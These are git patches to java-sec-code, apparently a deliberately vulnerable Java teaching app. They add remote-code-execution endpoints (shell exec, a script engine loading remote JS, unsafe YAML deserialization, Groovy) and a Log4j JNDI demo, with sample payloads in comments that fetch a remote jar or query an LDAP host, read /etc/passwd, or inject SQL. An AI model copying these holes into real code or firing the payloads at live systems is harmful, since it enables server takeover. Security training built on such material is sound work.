             return "Upload failed. Illeagl picture.";
         }
 
 
         // 判断MIME类型是否在黑名单内 校验2
-        String mimeTypeBlackList[] = {
+        String[] mimeTypeBlackList = {
                 "text/html",
                 "text/javascript",
                 "application/javascript",
@@ -115,17 +122,18 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
             // 用contains是为了防止text/html;charset=UTF-8绕过
             if (SecurityUtil.replaceSpecialStr(mimeType).toLowerCase().contains(blackMimeType)) {
                 logger.error("[-] Mime type error: " + mimeType);
-                deleteFile(excelFile);
+                deleteFile(filePath);
                 return "Upload failed. Illeagl picture.";
             }
         }
 
         // 判断文件内容是否是图片 校验3
         boolean isImageFlag = isImage(excelFile);
+        deleteFile(randomFilePath);
 
         if (!isImageFlag) {
             logger.error("[-] File is not Image");
-            deleteFile(excelFile);
+            deleteFile(filePath);
             return "Upload failed. Illeagl picture.";
         }
 
@@ -137,28 +145,29 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
             Files.write(path, bytes);
         } catch (IOException e) {
             logger.error(e.toString());
-            deleteFile(excelFile);
+            deleteFile(filePath);
             return "Upload failed";
         }
 
-        deleteFile(excelFile);
         logger.info("[+] Safe file. Suffix: {}, MIME: {}", Suffix, mimeType);
-        logger.info("[+] Successfully uploaded {}{}", UPLOADED_FOLDER, multifile.getOriginalFilename());
-        return "Upload success";
+        logger.info("[+] Successfully uploaded {}", filePath);
+        return String.format("You successfully uploaded '%s'", filePath);
     }
 
-    private void deleteFile(File... files) {
-        for (File file : files) {
-            if (file.exists()) {
-                boolean ret = file.delete();
-                if (ret) {
-                    logger.debug("File delete successfully!");
-                }
+    private void deleteFile(String filePath) {
+        File delFile = new File(filePath);
+        if(delFile.isFile() && delFile.exists()) {
+            if (delFile.delete()) {
+                logger.info("[+] " + filePath + " delete successfully!");
+                return;
             }
         }
+        logger.info(filePath + " delete failed!");
     }
 
     /**
+     * 为了使用ImageIO.read()
+     *
      * 不建议使用transferTo，因为原始的MultipartFile会被覆盖
      * https://stackoverflow.com/questions/24339990/how-to-convert-a-multipart-file-to-file
      */
@@ -166,8 +175,9 @@ private File convert(MultipartFile multiFile) throws Exception {
         String fileName = multiFile.getOriginalFilename();
         String suffix = fileName.substring(fileName.lastIndexOf("."));
         UUID uuid = Generators.timeBasedGenerator().generate();
-
-        File convFile = new File(UPLOADED_FOLDER + uuid + suffix);
+        randomFilePath = UPLOADED_FOLDER + uuid + suffix;
+        // 随机生成一个同后缀名的文件
+        File convFile = new File(randomFilePath);
         boolean ret = convFile.createNewFile();
         if (!ret) {
             return null;
@@ -183,6 +193,6 @@ private File convert(MultipartFile multiFile) throws Exception {
      */
     private static boolean isImage(File file) throws IOException {
         BufferedImage bi = ImageIO.read(file);
-        return bi == null;
+        return bi != null;
     }
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index c9934946..6f920495 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -7,13 +7,17 @@ mybatis.mapper-locations=classpath:mapper/*.xml
 # mybatis SQL log
 logging.level.org.joychou.mapper=debug
 
-# Spring Boot Actuator Vulnerable Config
+# Spring Boot Actuator Config
 management.security.enabled=false
+endpoints.enabled=false
+
+
 # logging.config=classpath:logback-online.xml
 
 # 业务的callback参数，不支持多个
 joychou.business.callback = callback_
 
+
 ### check referer configuration begins ###
 joychou.security.referer.enabled = false
 joychou.security.referer.host = joychou.org, joychou.com
@@ -38,5 +42,5 @@ joychou.security.jsonp.referer.check.enabled = true
 joychou.security.jsonp.callback = callback, _callback
 ### jsonp configuration ends ###
 
-
+# swagger
 swagger.enable = true
\ No newline at end of file
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 72779b8e..9d27f958 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -11,7 +11,8 @@
         <a th:href="@{/swagger-ui.html}">Swagger</a>&nbsp;&nbsp;
         <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
         <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
-        <a th:href="@{/file/pic}">FileUpload</a>&nbsp;&nbsp;
+        <a th:href="@{/file/pic}">Picture Upload</a>&nbsp;&nbsp;
+        <a th:href="@{/file/any}">File Upload</a>&nbsp;&nbsp;
         <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
         <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
diff --git a/src/main/resources/templates/uploadStatus.html b/src/main/resources/templates/uploadStatus.html
new file mode 100644
index 00000000..f39fa45c
--- /dev/null
+++ b/src/main/resources/templates/uploadStatus.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en" xmlns:th="http://www.thymeleaf.org">
+<body>
+
+<div th:if="${message}">
+    <h4 th:text="${message}"/>
+</div>
+
+</body>
+</html>
\ No newline at end of file

From 1f9da367f90eba38049fbc3bc510b847fb9f173a Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 26 Mar 2021 17:30:42 +0800
Subject: [PATCH 05/20] add rce

---
 README.md                                     |  7 +-
 README_zh.md                                  |  7 +-
 java-sec-code.iml                             |  5 +-
 pom.xml                                       | 15 ++++
 src/main/java/org/joychou/controller/Rce.java | 88 ++++++++++++++++++-
 5 files changed, 117 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 56d10960..c52fd3d9 100644
--- a/README.md
+++ b/README.md
@@ -11,7 +11,7 @@ This project can also be called Java vulnerability code.
 
 Each vulnerability type code has a security vulnerability by default unless there is no vulnerability. The relevant fix code is in the comments or code. Specifically, you can view each vulnerability code and comments.
 
-[Online demo](http://118.25.15.216:8080)
+Due to the server expiration, the online demo site had to go offline.
 
 Login username & password:
 
@@ -40,6 +40,11 @@ Sort by letter.
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
+  - Runtime
+  - ProcessBuilder
+  - ScriptEngine
+  - Yaml Deserialize  
+  - Groovy
 - [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
diff --git a/README_zh.md b/README_zh.md
index 72477885..97693583 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -10,7 +10,7 @@
 
 每个漏洞类型代码默认存在安全漏洞（除非本身不存在漏洞），相关修复代码在注释里。具体可查看每个漏洞代码和注释。
 
-[在线Demo](http://118.25.15.216:8080)
+由于服务器到期，在线的Demo网站已不能使用。
 
 登录用户名密码：
 
@@ -35,6 +35,11 @@ joychou/joychou123
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
+    - Runtime
+    - ProcessBuilder  
+    - ScriptEngine
+    - Yaml Deserialize
+    - Groovy
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 59b2063d..e8317c18 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -41,7 +41,6 @@
     <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:log4j-over-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.yaml:snakeyaml:1.17" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.11" level="project" />
     <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.11" level="project" />
@@ -216,5 +215,9 @@
     <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
     <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
     <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.16" level="project" />
+    <orderEntry type="library" name="Maven: org.yaml:snakeyaml:1.21" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-test:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: junit:junit:4.12" level="project" />
+    <orderEntry type="library" name="Maven: org.hamcrest:hamcrest-core:1.3" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 6f8f3990..bcb6fc14 100644
--- a/pom.xml
+++ b/pom.xml
@@ -256,6 +256,21 @@
             <scope>provided</scope>
         </dependency>
 
+        <dependency>
+            <groupId>org.yaml</groupId>
+            <artifactId>snakeyaml</artifactId>
+            <version>1.21</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-test</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>junit</groupId>
+            <artifactId>junit</artifactId>
+        </dependency>
 
     </dependencies>
 
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index d87b2a7b..6d6a3417 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -1,13 +1,21 @@
 package org.joychou.controller;
 
+import groovy.lang.GroovyShell;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
 
+import javax.script.Bindings;
+import javax.script.ScriptContext;
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineManager;
 import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
 
+
 /**
  * Java code execute
  *
@@ -17,7 +25,7 @@
 @RequestMapping("/rce")
 public class Rce {
 
-    @GetMapping("/exec")
+    @GetMapping("/runtime/exec")
     public String CommandExec(String cmd) {
         Runtime run = Runtime.getRuntime();
         StringBuilder sb = new StringBuilder();
@@ -40,9 +48,85 @@ public String CommandExec(String cmd) {
             inBr.close();
             in.close();
         } catch (Exception e) {
-            return "Except";
+            return e.toString();
+        }
+        return sb.toString();
+    }
+
+
+    /**
+     * http://localhost:8080/rce/ProcessBuilder?cmd=whoami
+     * @param cmd cmd
+     */
+    @GetMapping("/ProcessBuilder")
+    public String processBuilder(String cmd) {
+
+        StringBuilder sb = new StringBuilder();
+
+        try {
+            String[] arrCmd = {"/bin/sh", "-c", cmd};
+            ProcessBuilder processBuilder = new ProcessBuilder(arrCmd);
+            Process p = processBuilder.start();
+            BufferedInputStream in = new BufferedInputStream(p.getInputStream());
+            BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
+            String tmpStr;
+
+            while ((tmpStr = inBr.readLine()) != null) {
+                sb.append(tmpStr);
+            }
+        } catch (Exception e) {
+            return e.toString();
         }
+
         return sb.toString();
     }
+
+
+    /**
+     * http://localhost:8080/rce/jscmd?jsurl=http://xx.yy/zz.js
+     *
+     * curl http://xx.yy/zz.js
+     * var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("open -a Calculator");}
+     *
+     * @param jsurl js url
+     */
+    @GetMapping("/jscmd")
+    public void jsEngine(String jsurl) throws Exception{
+        // js nashorn javascript ecmascript
+        ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
+        Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
+        String cmd = String.format("load(\"%s\")", jsurl);
+        engine.eval(cmd, bindings);
+    }
+
+
+    /**
+     * http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]]]
+     * yaml-payload.jar: https://github.com/artsploit/yaml-payload
+     *
+     * @param content payloads
+     */
+    @GetMapping("/vuln/yarm")
+    public void yarm(String content) {
+        Yaml y = new Yaml();
+        y.load(content);
+    }
+
+    @GetMapping("/sec/yarm")
+    public void secYarm(String content) {
+        Yaml y = new Yaml(new SafeConstructor());
+        y.load(content);
+    }
+
+    /**
+     * http://localhost:8080/rce/groovy?content="open -a Calculator".execute()
+     * @param content groovy shell
+     */
+    @GetMapping("groovy")
+    public void groovyshell(String content) {
+        GroovyShell groovyShell = new GroovyShell();
+        groovyShell.evaluate(content);
+    }
+
 }
 

From ed281042e28ba3292c126844ca9df90df39a68b7 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 31 Mar 2022 15:43:26 +0800
Subject: [PATCH 06/20] add log4j

---
 README.md                                     |  1 +
 README_zh.md                                  |  1 +
 java-sec-code.iml                             |  4 +--
 pom.xml                                       |  9 +++++-
 .../java/org/joychou/controller/Log4j.java    | 29 +++++++++++++++++++
 .../java/org/joychou/controller/SQLI.java     |  2 +-
 .../java/org/joychou/controller/SSRF.java     |  2 +-
 .../java/org/joychou/filter/OriginFilter.java |  1 +
 .../joychou/security/ssrf/SSRFChecker.java    |  4 +--
 src/main/java/org/joychou/util/HttpUtils.java | 13 +++++----
 src/main/resources/application.properties     |  2 +-
 11 files changed, 54 insertions(+), 14 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Log4j.java

diff --git a/README.md b/README.md
index c52fd3d9..d4d62134 100644
--- a/README.md
+++ b/README.md
@@ -37,6 +37,7 @@ Sort by letter.
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jsonp.java)
+- [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
diff --git a/README_zh.md b/README_zh.md
index 97693583..8beb7805 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -32,6 +32,7 @@ joychou/joychou123
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
diff --git a/java-sec-code.iml b/java-sec-code.iml
index e8317c18..9f5f1029 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -79,8 +79,8 @@
     <orderEntry type="library" name="Maven: commons-codec:commons-codec:1.10" level="project" />
     <orderEntry type="library" name="Maven: org.apache.httpcomponents:fluent-hc:4.3.6" level="project" />
     <orderEntry type="library" name="Maven: commons-logging:commons-logging:1.1.3" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.8.2" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.7" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
     <orderEntry type="library" name="Maven: com.squareup.okhttp:okhttp:2.5.0" level="project" />
     <orderEntry type="library" name="Maven: com.squareup.okio:okio:1.6.0" level="project" />
     <orderEntry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />
diff --git a/pom.xml b/pom.xml
index bcb6fc14..e22713da 100644
--- a/pom.xml
+++ b/pom.xml
@@ -100,7 +100,13 @@
         <dependency>
             <groupId>org.apache.logging.log4j</groupId>
             <artifactId>log4j-core</artifactId>
-            <version>2.8.2</version>
+            <version>2.9.1</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.logging.log4j</groupId>
+            <artifactId>log4j-api</artifactId>
+            <version>2.9.1</version>
         </dependency>
 
         <dependency>
@@ -129,6 +135,7 @@
             <artifactId>spring-boot-starter-actuator</artifactId>
         </dependency>
 
+        <!-- eureka -->
         <dependency>
             <groupId>org.springframework.cloud</groupId>
             <artifactId>spring-cloud-starter-netflix-eureka-client</artifactId>
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
new file mode 100644
index 00000000..ada8a394
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -0,0 +1,29 @@
+package org.joychou.controller;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class Log4j {
+
+    private static final Logger logger = LogManager.getLogger("Log4j");
+
+    /**
+     * http://localhost:8080/log4j?token=${jndi:ldap://wffsr5.dnslog.cn:9999}
+     * Default: error/fatal/off
+     * Fix: Update log4j to lastet version.
+     * @param token token
+     */
+    @GetMapping("/log4j")
+    public String log4j(String token) {
+        if(token.equals("java-sec-code")) {
+            return "java sec code";
+        } else {
+            logger.error(token);
+            return "error";
+        }
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index 7ea518a5..afabfe15 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -43,7 +43,7 @@ public class SQLI {
 
     /**
      * Vuln Code.
-     * http://localhost:8080/sqli/jdbc/vul?username=joychou
+     * http://localhost:8080/sqli/jdbc/vuln?username=joychou
      *
      * @param username username
      */
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 8645fd13..aa76f9fe 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -67,7 +67,7 @@ public String URLConnectionSec(String url) {
     public String httpURLConnection(@RequestParam String url) {
         try {
             SecurityUtil.startSSRFHook();
-            return HttpUtils.HTTPURLConnection(url);
+            return HttpUtils.HttpURLConnection(url);
         } catch (SSRFException | IOException e) {
             return e.getMessage();
         } finally {
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
index 32195a27..d57f667a 100644
--- a/src/main/java/org/joychou/filter/OriginFilter.java
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -7,6 +7,7 @@
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
 
+import org.apache.catalina.servlet4preview.http.HttpFilter;
 import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 01b1b350..0930e2b5 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -147,8 +147,8 @@ static boolean isInternalIp(String strIP) {
     /**
      * host转换为IP
      * 会将各种进制的ip转为正常ip
-     * 167772161转换为10.0.0.1
-     * 127.0.0.1.xip.io转换为127.0.0.1
+     * 167772161 转换为  10.0.0.1
+     * 127.0.0.1.xip.io 转换为 127.0.0.1
      *
      * @param host 域名host
      */
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 4d2be1a4..4f608301 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -5,7 +5,6 @@
 import org.apache.commons.httpclient.methods.GetMethod;
 import org.apache.commons.io.IOUtils;
 import org.apache.http.HttpResponse;
-import org.apache.http.client.config.RequestConfig;
 import org.apache.http.client.fluent.Request;
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
@@ -21,6 +20,7 @@
 import javax.imageio.ImageIO;
 import java.io.BufferedReader;
 import java.io.IOException;
+import java.io.InputStream;
 import java.io.InputStreamReader;
 import java.net.HttpURLConnection;
 import java.net.URI;
@@ -33,7 +33,7 @@
  */
 public class HttpUtils {
 
-    private static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
+    private final static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
 
     public static String commonHttpClient(String url) {
 
@@ -110,12 +110,14 @@ public static String URLConnection(String url) {
     }
 
 
-    public static String HTTPURLConnection(String url) {
+    public static String HttpURLConnection(String url) {
         try {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
-            HttpURLConnection httpUrl = (HttpURLConnection) urlConnection;
-            BufferedReader in = new BufferedReader(new InputStreamReader(httpUrl.getInputStream())); //send request
+            HttpURLConnection conn = (HttpURLConnection) urlConnection;
+            // Many HttpURLConnection methods can send http request, such as getResponseCode, getHeaderField
+            InputStream is = conn.getInputStream();  // send request
+            BufferedReader in = new BufferedReader(new InputStreamReader(is));
             String inputLine;
             StringBuilder html = new StringBuilder();
 
@@ -206,7 +208,6 @@ public static String HttpAsyncClients(String url) {
                 logger.error(e.getMessage());
             }
         }
-
     }
 
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 6f920495..96ca82c3 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -9,7 +9,7 @@ logging.level.org.joychou.mapper=debug
 
 # Spring Boot Actuator Config
 management.security.enabled=false
-endpoints.enabled=false
+endpoints.enabled=true
 
 
 # logging.config=classpath:logback-online.xml

From 707d395a77a6e42f7483fa1257fb6a74f301e7ae Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 21 Sep 2022 12:19:48 +0800
Subject: [PATCH 07/20] add jwt

---
 README.md                                     |   3 +-
 README_zh.md                                  |   3 +-
 java-sec-code.iml                             |   4 +-
 pom.xml                                       |  21 ++++
 src/main/java/org/joychou/Application.java    |   1 -
 .../org/joychou/controller/Deserialize.java   |   3 +
 src/main/java/org/joychou/controller/Jwt.java |  62 +++++++++++
 .../java/org/joychou/controller/SQLI.java     |  44 ++++++++
 .../java/org/joychou/controller/SSRF.java     |   5 +
 .../java/org/joychou/util/CookieUtils.java    |  24 ++++
 src/main/java/org/joychou/util/HttpUtils.java |  14 ++-
 src/main/java/org/joychou/util/JwtUtils.java  | 103 ++++++++++++++++++
 src/main/resources/templates/index.html       |   5 +
 13 files changed, 287 insertions(+), 5 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Jwt.java
 create mode 100644 src/main/java/org/joychou/util/CookieUtils.java
 create mode 100644 src/main/java/org/joychou/util/JwtUtils.java

diff --git a/README.md b/README.md
index d4d62134..edfda09c 100644
--- a/README.md
+++ b/README.md
@@ -57,7 +57,7 @@ Sort by letter.
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
 - [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-
+- [JWT](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jwt.java)
 
 
 ## Vulnerability Description
@@ -75,6 +75,7 @@ Sort by letter.
 - [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
 - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
+- [JWT](https://github.com/JoyChou93/java-sec-code/wiki/JWT)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 ## How to run
diff --git a/README_zh.md b/README_zh.md
index 8beb7805..111c8be3 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -51,7 +51,7 @@ joychou/joychou123
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
 - [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-
+- [JWT](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jwt.java)
 
 ## 漏洞说明
 
@@ -68,6 +68,7 @@ joychou/joychou123
 - [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
 - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
+- [JWT](https://github.com/JoyChou93/java-sec-code/wiki/JWT)  
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 9f5f1029..445cfa46 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -86,7 +86,6 @@
     <orderEntry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />
     <orderEntry type="library" name="Maven: cglib:cglib:2.2.2" level="project" />
     <orderEntry type="library" name="Maven: asm:asm:3.3.1" level="project" />
-    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.3" level="project" />
     <orderEntry type="library" name="Maven: org.jolokia:jolokia-core:1.6.0" level="project" />
     <orderEntry type="library" name="Maven: com.googlecode.json-simple:json-simple:1.1.1" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-actuator:1.5.1.RELEASE" level="project" />
@@ -219,5 +218,8 @@
     <orderEntry type="library" name="Maven: org.springframework:spring-test:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: junit:junit:4.12" level="project" />
     <orderEntry type="library" name="Maven: org.hamcrest:hamcrest-core:1.3" level="project" />
+    <orderEntry type="library" name="Maven: commons-beanutils:commons-beanutils:1.9.4" level="project" />
+    <orderEntry type="library" name="Maven: io.jsonwebtoken:jjwt:0.9.1" level="project" />
+    <orderEntry type="library" name="Maven: com.auth0:java-jwt:4.0.0" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index e22713da..aa8e89a5 100644
--- a/pom.xml
+++ b/pom.xml
@@ -279,6 +279,27 @@
             <artifactId>junit</artifactId>
         </dependency>
 
+        <!-- add commons-beanutils gadget -->
+        <dependency>
+            <groupId>commons-beanutils</groupId>
+            <artifactId>commons-beanutils</artifactId>
+            <version>1.9.4</version>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/io.jsonwebtoken/jjwt -->
+        <dependency>
+            <groupId>io.jsonwebtoken</groupId>
+            <artifactId>jjwt</artifactId>
+            <version>0.9.1</version>
+        </dependency>
+
+        <!-- https://github.com/auth0/java-jwt https://mvnrepository.com/artifact/com.auth0/java-jwt -->
+        <dependency>
+            <groupId>com.auth0</groupId>
+            <artifactId>java-jwt</artifactId>
+            <version>4.0.0</version>
+        </dependency>
+
